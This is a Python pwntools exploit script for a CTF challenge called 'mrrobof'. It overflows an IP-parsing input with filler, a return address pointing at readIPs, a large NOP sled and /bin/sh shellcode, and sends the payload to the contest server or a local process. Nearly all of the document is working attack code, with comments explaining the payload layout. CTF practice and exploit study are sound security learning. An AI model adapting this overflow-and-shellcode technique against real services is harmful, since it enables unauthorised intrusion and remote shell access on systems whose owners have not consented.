Tags: pwn python
```
import time

from pwn import *
# Local copy of the challenge binary: used for symbol lookup (e.symbols below)
# and, when DEBUG is set, spawned locally by getpipe().
binary = "mrrobof" #Renamed just because
# Remote CTF instance. Only the contest box should ever receive this payload.
chall, port = "mrrobof01.3dsctf.org", 8006
e = ELF(binary)
# NOTE(review): context.arch is never set here, so flat()/shellcraft use the
# pwntools default (presumably i386); `context.binary = e` would derive
# arch/bits/endianness from the ELF -- confirm against the target.
# DEBUG logging dumps every byte on the tube; the payload is ~0x1ff00 bytes.
context.log_level = "DEBUG"
# True: run the local binary under pwntools; False: talk to chall:port.
DEBUG = False
def getpipe():
    """Return a pwntools tube to the target.

    When the module-level ``DEBUG`` flag is set, spawn the local ``binary``
    as a process; otherwise open a TCP connection to the remote challenge
    service at ``chall``:``port``.
    """
    if not DEBUG:
        return remote(chall, port)
    return process(binary)
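# Size of the overflow body; the three trailing NOPs appended below bring the
# total to input_len + 3 (see the comment on that line for why).
input_len = 0x1ff00
"""Send an example ip str + someint*0x100 + randrange(0x2,0x28)"""
# Well-formed IPv6 literal followed by a '.', presumably so the parser accepts
# the prefix before the overflow bytes -- confirm against readIPs.
ip_ex = "2001:0db8:85a3:0000:0000:8a2e:0370:7334."
# /bin/sh shellcode for the current context.arch (never set in this file, so
# the pwntools default applies; `context.binary = e` would pin it to the ELF).
shellcode = asm(shellcraft.linux.sh())
"""Heh, might not be PIE after all. But there's something I missed again."""
# Non-PIE binary: the static symbol address is usable directly as a return target.
readIPs = e.symbols['readIPs'] #Again?
# 12 filler bytes up to the saved return address, then the packed readIPs address.
control_eip = flat("A"*12, readIPs)
# NOP sled sized so ip_ex + control_eip + sled + shellcode == input_len exactly.
# Guard against a negative size: "\x90" * negative silently yields "" and the
# payload would be short without any warning.
sled_len = input_len - len(shellcode) - len(ip_ex) - len(control_eip)
if sled_len < 0:
    raise ValueError("shellcode plus overhead exceeds input_len by %d bytes" % -sled_len)
padding = "\x90" * sled_len
code = padding + shellcode
payload = ip_ex + control_eip + code
payload += '\x90'*3 #Need counting byte of 0x2-0x28 to pass, last gets chopped
print "Length:", hex(len(payload))
# Keep a copy on disk for gdb / manual replay. Binary mode (no newline
# translation) and a context manager so the handle is flushed and closed.
with open("payload", "wb") as fh:
    fh.write(payload)
p = getpipe()
p.sendline(payload)
print p.recv()
time.sleep(0.3)
# Locally, read again only while the process is still alive (poll() is None);
# the remote tube has no exit status, so always attempt the read there.
# The tube may already be closed (crash, or the service hung up), so treat
# EOF as an outcome to report rather than a traceback.
if not DEBUG or p.poll() is None:
    try:
        print p.recv()
    except EOFError:
        print "tube closed before the second recv()"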
```